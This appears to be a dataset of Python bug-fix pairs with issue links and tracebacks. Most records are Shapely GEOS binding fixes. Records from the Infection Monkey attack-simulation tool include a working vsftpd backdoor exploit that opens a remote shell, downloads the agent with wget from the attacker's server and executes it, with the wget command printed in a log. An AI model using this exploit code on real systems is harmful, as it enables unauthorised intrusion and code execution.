self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSHasZ,
):
pred.errcheck = errcheck_predicate
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_closed"] = self.GEOSisClosed
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
|
def __init__(self, dll):
super(LGEOS300, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in keys:
setattr(self, key, getattr(self._lgeos, key))
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.errcheck = errcheck_wkb
self.GEOSGeomToWKT.errcheck = errcheck_just_free
self.GEOSRelate.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSisClosed,
self.GEOSHasZ,
):
pred.errcheck = errcheck_predicate
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_closed"] = self.GEOSisClosed
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
|
https://github.com/Toblerity/Shapely/issues/176
|
$ python -c "import shapely.geos"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/geos.py", line 133, in <module>
prototype(_lgeos, geos_version)
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/ctypes_declarations.py", line 279, in prototype
lgeos.GEOSisClosed.restype = c_byte
File "/usr/lib/python2.7/ctypes/__init__.py", line 378, in __getattr__
func = self.__getitem__(name)
File "/usr/lib/python2.7/ctypes/__init__.py", line 383, in __getitem__
func = self._FuncPtr((name_or_ordinal, self))
AttributeError: /usr/lib/libgeos_c.so.1: undefined symbol: GEOSisClosed
|
AttributeError
|
def __init__(self, dll):
super(LGEOS310, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS_r(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in [x for x in keys if not x.endswith("_r")]:
if key + "_r" in keys:
reentr_func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(reentr_func, self.geos_handle)
attr.__name__ = reentr_func.__name__
setattr(self, key, attr)
else:
setattr(self, key, getattr(self._lgeos, key))
if not hasattr(self, "GEOSFree"):
# GEOS < 3.1.1
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.func.errcheck = errcheck_wkb
self.GEOSGeomToWKT.func.errcheck = errcheck_just_free
self.GEOSRelate.func.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSisClosed,
self.GEOSHasZ,
):
pred.func.errcheck = errcheck_predicate
self.GEOSisValidReason.func.errcheck = errcheck_just_free
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["prepared_intersects"] = self.GEOSPreparedIntersects
self.methods["prepared_contains"] = self.GEOSPreparedContains
self.methods["prepared_contains_properly"] = self.GEOSPreparedContainsProperly
self.methods["prepared_covers"] = self.GEOSPreparedCovers
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
self.methods["cascaded_union"] = self.GEOSUnionCascaded
|
def __init__(self, dll):
super(LGEOS310, self).__init__(dll)
self.geos_handle = self._lgeos.initGEOS_r(notice_h, error_h)
keys = list(self._lgeos.__dict__.keys())
for key in [x for x in keys if not x.endswith("_r")]:
if key + "_r" in keys:
reentr_func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(reentr_func, self.geos_handle)
attr.__name__ = reentr_func.__name__
setattr(self, key, attr)
else:
setattr(self, key, getattr(self._lgeos, key))
if not hasattr(self, "GEOSFree"):
# GEOS < 3.1.1
self.GEOSFree = self._lgeos.free
# Deprecated
self.GEOSGeomToWKB_buf.func.errcheck = errcheck_wkb
self.GEOSGeomToWKT.func.errcheck = errcheck_just_free
self.GEOSRelate.func.errcheck = errcheck_just_free
for pred in (
self.GEOSDisjoint,
self.GEOSTouches,
self.GEOSIntersects,
self.GEOSCrosses,
self.GEOSWithin,
self.GEOSContains,
self.GEOSOverlaps,
self.GEOSEquals,
self.GEOSEqualsExact,
self.GEOSisEmpty,
self.GEOSisValid,
self.GEOSisSimple,
self.GEOSisRing,
self.GEOSisClosed,
self.GEOSHasZ,
):
pred.func.errcheck = errcheck_predicate
self.GEOSisValidReason.func.errcheck = errcheck_just_free
self.methods["area"] = self.GEOSArea
self.methods["boundary"] = self.GEOSBoundary
self.methods["buffer"] = self.GEOSBuffer
self.methods["centroid"] = self.GEOSGetCentroid
self.methods["representative_point"] = self.GEOSPointOnSurface
self.methods["convex_hull"] = self.GEOSConvexHull
self.methods["distance"] = self.GEOSDistance
self.methods["envelope"] = self.GEOSEnvelope
self.methods["length"] = self.GEOSLength
self.methods["has_z"] = self.GEOSHasZ
self.methods["is_empty"] = self.GEOSisEmpty
self.methods["is_ring"] = self.GEOSisRing
self.methods["is_closed"] = self.GEOSisClosed
self.methods["is_simple"] = self.GEOSisSimple
self.methods["is_valid"] = self.GEOSisValid
self.methods["disjoint"] = self.GEOSDisjoint
self.methods["touches"] = self.GEOSTouches
self.methods["intersects"] = self.GEOSIntersects
self.methods["crosses"] = self.GEOSCrosses
self.methods["within"] = self.GEOSWithin
self.methods["contains"] = self.GEOSContains
self.methods["overlaps"] = self.GEOSOverlaps
self.methods["equals"] = self.GEOSEquals
self.methods["equals_exact"] = self.GEOSEqualsExact
self.methods["relate"] = self.GEOSRelate
self.methods["difference"] = self.GEOSDifference
self.methods["symmetric_difference"] = self.GEOSSymDifference
self.methods["union"] = self.GEOSUnion
self.methods["intersection"] = self.GEOSIntersection
self.methods["prepared_intersects"] = self.GEOSPreparedIntersects
self.methods["prepared_contains"] = self.GEOSPreparedContains
self.methods["prepared_contains_properly"] = self.GEOSPreparedContainsProperly
self.methods["prepared_covers"] = self.GEOSPreparedCovers
self.methods["simplify"] = self.GEOSSimplify
self.methods["topology_preserve_simplify"] = self.GEOSTopologyPreserveSimplify
self.methods["cascaded_union"] = self.GEOSUnionCascaded
|
https://github.com/Toblerity/Shapely/issues/176
|
$ python -c "import shapely.geos"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/geos.py", line 133, in <module>
prototype(_lgeos, geos_version)
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/ctypes_declarations.py", line 279, in prototype
lgeos.GEOSisClosed.restype = c_byte
File "/usr/lib/python2.7/ctypes/__init__.py", line 378, in __getattr__
func = self.__getitem__(name)
File "/usr/lib/python2.7/ctypes/__init__.py", line 383, in __getitem__
func = self._FuncPtr((name_or_ordinal, self))
AttributeError: /usr/lib/libgeos_c.so.1: undefined symbol: GEOSisClosed
|
AttributeError
|
def __init__(self, dll):
super(LGEOS330, self).__init__(dll)
# GEOS 3.3.8 from homebrew has, but doesn't advertise
# GEOSPolygonize_full. We patch it in explicitly here.
key = "GEOSPolygonize_full"
func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(func, self.geos_handle)
attr.__name__ = func.__name__
setattr(self, key, attr)
for pred in (self.GEOSisClosed,):
pred.func.errcheck = errcheck_predicate
self.methods["unary_union"] = self.GEOSUnaryUnion
self.methods["is_closed"] = self.GEOSisClosed
self.methods["cascaded_union"] = self.methods["unary_union"]
|
def __init__(self, dll):
super(LGEOS330, self).__init__(dll)
# GEOS 3.3.8 from homebrew has, but doesn't advertise
# GEOSPolygonize_full. We patch it in explicitly here.
key = "GEOSPolygonize_full"
func = getattr(self._lgeos, key + "_r")
attr = ftools.partial(func, self.geos_handle)
attr.__name__ = func.__name__
setattr(self, key, attr)
self.methods["unary_union"] = self.GEOSUnaryUnion
self.methods["cascaded_union"] = self.methods["unary_union"]
|
https://github.com/Toblerity/Shapely/issues/176
|
$ python -c "import shapely.geos"
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/geos.py", line 133, in <module>
prototype(_lgeos, geos_version)
File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/ctypes_declarations.py", line 279, in prototype
lgeos.GEOSisClosed.restype = c_byte
File "/usr/lib/python2.7/ctypes/__init__.py", line 378, in __getattr__
func = self.__getitem__(name)
File "/usr/lib/python2.7/ctypes/__init__.py", line 383, in __getitem__
func = self._FuncPtr((name_or_ordinal, self))
AttributeError: /usr/lib/libgeos_c.so.1: undefined symbol: GEOSisClosed
|
AttributeError
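A hedged sketch of the version-gating pattern behind these three changes: probe the loaded library for the symbol before prototyping it, so importing against a pre-3.3 libgeos_c (which lacks GEOSisClosed) cannot raise AttributeError, and wire the function up only in the LGEOS class for versions where it exists.

import ctypes
import ctypes.util

path = ctypes.util.find_library("geos_c")  # may be None if GEOS is absent
if path:
    lgeos = ctypes.CDLL(path)
    if hasattr(lgeos, "GEOSisClosed"):
        # Safe to declare the prototype: GEOS >= 3.3 exports the symbol.
        lgeos.GEOSisClosed.restype = ctypes.c_byte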
|
def cleanup():
del lgeos
|
def cleanup():
lgeos.__del__()
|
https://github.com/Toblerity/Shapely/issues/106
|
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
Error in sys.exitfunc:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
|
AttributeError
|
def __del__(self):
"""Cleanup GEOS related processes"""
if self._lgeos is not None:
self._lgeos.finishGEOS()
self._lgeos = None
self.geos_handle = None
LOG.debug("GEOS Finished")
|
def __del__(self):
"""Cleanup GEOS related processes"""
if self._lgeos is not None:
self._lgeos.finishGEOS()
self._lgeos = None
self.geos_handle = None
|
https://github.com/Toblerity/Shapely/issues/106
|
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
Error in sys.exitfunc:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
|
AttributeError
|
def cleanup(proxy):
del proxy
|
def cleanup():
del lgeos
|
https://github.com/Toblerity/Shapely/issues/106
|
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
Error in sys.exitfunc:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
|
AttributeError
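A minimal sketch of the shutdown-safe shape these three changes converge on: an idempotent __del__ plus an atexit hook that merely drops a reference, rather than calling __del__ by hand on a module global that may already be None at interpreter teardown. LGEOSSketch is an illustrative stand-in, not the library class.

import atexit

class LGEOSSketch:
    def __init__(self):
        self._lgeos = object()  # stand-in for the loaded GEOS DLL

    def __del__(self):
        if self._lgeos is not None:
            self._lgeos = None  # finishGEOS() would be called here

lgeos = LGEOSSketch()

def cleanup(proxy):
    del proxy  # just release the reference; __del__ stays idempotent

atexit.register(cleanup, lgeos)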
|
def _exploit_host(self):
LOG.info("Attempting to trigger the Backdoor..")
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
ftp_socket.recv(RECV_128).decode("utf-8")
if self.socket_send_recv(ftp_socket, USERNAME + b"\n"):
time.sleep(FTP_TIME_BUFFER)
self.socket_send(ftp_socket, PASSWORD + b"\n")
ftp_socket.close()
LOG.info("Backdoor Enabled, Now we can run commands")
else:
LOG.error("Failed to trigger backdoor on %s", self.host.ip_addr)
return False
LOG.info("Attempting to connect to backdoor...")
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT):
LOG.info("Connected to backdoor on %s:6200", self.host.ip_addr)
uname_m = str.encode(UNAME_M + "\n")
response = self.socket_send_recv(backdoor_socket, uname_m)
if response:
LOG.info("Response for uname -m: %s", response)
if "" != response.lower().strip():
# command execution is successful
self.host.os["machine"] = response.lower().strip()
self.host.os["type"] = "linux"
else:
LOG.info("Failed to execute command uname -m on victim %r ", self.host)
src_path = get_target_monkey(self.host)
LOG.info(
"src for suitable monkey executable for host %r is %s", self.host, src_path
)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Create a http server to host the monkey
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
dropper_target_path_linux = self._config.dropper_target_path_linux
LOG.info("Download link for monkey is %s", http_path)
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {
"monkey_path": monkey_path,
"http_path": http_path,
}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
LOG.info("Monkey is now Downloaded ")
else:
LOG.error("Failed to download monkey at %s", self.host.ip_addr)
return False
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send()
# Run monkey on the machine
parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
run_monkey = RUN_MONKEY % {
"monkey_path": monkey_path,
"monkey_type": MONKEY_ARG,
"parameters": parameters,
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)
if backdoor_socket.send(run_monkey):
LOG.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
run_monkey,
)
self.add_executed_cmd(run_monkey.decode())
return True
else:
return False
|
def _exploit_host(self):
LOG.info("Attempting to trigger the Backdoor..")
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
ftp_socket.recv(RECV_128).decode("utf-8")
if self.socket_send_recv(ftp_socket, USERNAME + b"\n"):
time.sleep(FTP_TIME_BUFFER)
self.socket_send(ftp_socket, PASSWORD + b"\n")
ftp_socket.close()
LOG.info("Backdoor Enabled, Now we can run commands")
else:
LOG.error("Failed to trigger backdoor on %s", self.host.ip_addr)
return False
LOG.info("Attempting to connect to backdoor...")
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT):
LOG.info("Connected to backdoor on %s:6200", self.host.ip_addr)
uname_m = str.encode(UNAME_M + "\n")
response = self.socket_send_recv(backdoor_socket, uname_m)
if response:
LOG.info("Response for uname -m: %s", response)
if "" != response.lower().strip():
# command execution is successful
self.host.os["machine"] = response.lower().strip()
self.host.os["type"] = "linux"
else:
LOG.info("Failed to execute command uname -m on victim %r ", self.host)
src_path = get_target_monkey(self.host)
LOG.info(
"src for suitable monkey executable for host %r is %s", self.host, src_path
)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Create a http server to host the monkey
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
dropper_target_path_linux = self._config.dropper_target_path_linux
LOG.info("Download link for monkey is %s", http_path)
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {
"monkey_path": monkey_path,
"http_path": http_path,
}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
LOG.info("Monkey is now Downloaded ")
else:
LOG.error("Failed to download monkey at %s", self.host.ip_addr)
return False
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
T1222Telem(ScanStatus.USED, change_permission, self.host).send()
# Run monkey on the machine
parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
run_monkey = RUN_MONKEY % {
"monkey_path": monkey_path,
"monkey_type": MONKEY_ARG,
"parameters": parameters,
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)
if backdoor_socket.send(run_monkey):
LOG.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
run_monkey,
)
self.add_executed_cmd(run_monkey)
return True
else:
return False
|
https://github.com/guardicore/monkey/issues/616
|
2020-04-13 14:20:02,287 [7236:1716:INFO] vsftpd._exploit_host.102: src for suitable monkey executable for host VictimHost('192.168.56.101') is monkeyfs://monkey-linux-32
2020-04-13 14:20:07,142 [7236:1716:INFO] vsftpd._exploit_host.111: Download link for monkey is http://192.168.56.1:4059/monkey-linux-32
2020-04-13 14:20:07,142 [7236:1716:INFO] vsftpd._exploit_host.117: Download command is b'wget -O /tmp/monkey http://192.168.56.1:4059/monkey-linux-32\n'
2020-04-13 14:20:07,142 [7236:1716:INFO] vsftpd._exploit_host.119: Monkey is now Downloaded
2020-04-13 14:20:07,149 [7236:13508:DEBUG] http.log_message.108: FileServHTTPRequestHandler: 192.168.56.101 - - [13/Apr/2020 14:20:07] "GET /monkey-linux-32 HTTP/1.0" 200 -
2020-04-13 14:20:07,329 [7236:13508:INFO] http.report_download.252: File downloaded from (192.168.56.101,44962)
2020-04-13 14:20:07,329 [7236:13508:DEBUG] base_telem.send.25: Sending attack telemetry. Data: {"status": 2, "technique": "T1105", "filename": "monkeyfs://monkey-linux-32", "src": "192.168.56.1", "dst": "192.168.56.101"}
2020-04-13 14:20:07,331 [7236:13508:DEBUG] connectionpool._new_conn.959: Starting new HTTPS connection (1): 192.168.56.1:5000
2020-04-13 14:20:07,354 [7236:13508:DEBUG] connectionpool._make_request.437: https://192.168.56.1:5000 "POST /api/telemetry HTTP/1.1" 200 354
2020-04-13 14:20:07,355 [7236:1716:INFO] vsftpd._exploit_host.130: change_permission command is b'chmod +x /tmp/monkey\n'
2020-04-13 14:20:07,356 [7236:1716:ERROR] monkey.try_exploiting.342: Exception while attacking Victim Host 192.168.56.101: OS - [type-linux version-Unix machine-i686 ] Services - [tcp-22-{'display_name': 'SSH', 'port': 22, 'banner': 'SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n', 'name': 'ssh', 'os-version': 'Debian-8ubuntu1'} tcp-80-{'display_name': 'HTTP', 'port': 80, 'name': 'http', 'data': ('Apache/2.2.8 (Ubuntu) DAV/2', False)} mysqld-3306-{'display_name': 'MySQL', 'port': 3306, 'version': '5.0.51a-3ubuntu5', 'major_version': '5', 'minor_version': '0', 'build_version': '51a', 'capabilities': 30003, 'extcapabilities': 12334} tcp-445-{'display_name': 'SMB', 'port': 445, 'name': 'Samba 3.0.20-Debian'} ] target monkey: monkeyfs://monkey-linux-32 using VSFTPDExploiter: Object of type bytes is not JSON serializable
Traceback (most recent call last):
File "monkey\\infection_monkey\\monkey.py", line 327, in try_exploiting
File "monkey\\infection_monkey\\exploit\\HostExploiter.py", line 71, in exploit_host
File "monkey\\infection_monkey\\exploit\\vsftpd.py", line 132, in _exploit_host
File "monkey\\infection_monkey\ elemetry\�ase_telem.py", line 25, in send
File "json\\__init__.py", line 231, in dumps
File "json\\encoder.py", line 199, in encode
File "json\\encoder.py", line 257, in iterencode
File "json\\encoder.py", line 179, in default
TypeError: Object of type bytes is not JSON serializable
|
TypeError
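The root cause in miniature: json.dumps rejects bytes, so the command buffers must be decoded before they enter a telemetry payload, which is exactly what the two added .decode() calls do.

import json

cmd = str.encode("chmod +x /tmp/monkey" + "\n")
try:
    json.dumps({"command": cmd})
except TypeError:
    pass  # "Object of type bytes is not JSON serializable"
assert json.dumps({"command": cmd.decode()})  # decoded payload serializes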
|
def do_CONNECT(self):
LOG.info("Received a connect request!")
# just provide a tunnel, transfer the data with no modification
req = self
req.path = "https://%s/" % req.path.replace(":443", "")
u = urlsplit(req.path)
address = (u.hostname, u.port or 443)
try:
conn = socket.create_connection(address)
except socket.error as e:
LOG.debug(
"HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
% (repr(address), e)
)
self.send_error(504) # 504 Gateway Timeout
return
self.send_response(200, "Connection Established")
self.send_header("Connection", "close")
self.end_headers()
conns = [self.connection, conn]
keep_connection = True
while keep_connection:
keep_connection = False
rlist, wlist, xlist = select.select(conns, [], conns, self.timeout)
if xlist:
break
for r in rlist:
other = conns[1] if r is conns[0] else conns[0]
data = r.recv(8192)
if data:
other.sendall(data)
keep_connection = True
update_last_serve_time()
conn.close()
|
def do_CONNECT(self):
# just provide a tunnel, transfer the data with no modification
req = self
req.path = "https://%s/" % req.path.replace(":443", "")
u = urlsplit(req.path)
address = (u.hostname, u.port or 443)
try:
conn = socket.create_connection(address)
except socket.error as e:
LOG.debug(
"HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
% (repr(address), e)
)
self.send_error(504) # 504 Gateway Timeout
return
self.send_response(200, "Connection Established")
self.send_header("Connection", "close")
self.end_headers()
conns = [self.connection, conn]
keep_connection = True
while keep_connection:
keep_connection = False
rlist, wlist, xlist = select.select(conns, [], conns, self.timeout)
if xlist:
break
for r in rlist:
other = conns[1] if r is conns[0] else conns[0]
data = r.recv(8192)
if data:
other.sendall(data)
keep_connection = True
update_last_serve_time()
conn.close()
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def do_POST(self):
try:
content_length = int(self.headers["Content-Length"])
post_data = self.rfile.read(content_length).decode()
LOG.info("Received bootloader's request: {}".format(post_data))
try:
dest_path = self.path
r = requests.post(
url=dest_path,
data=post_data,
verify=False,
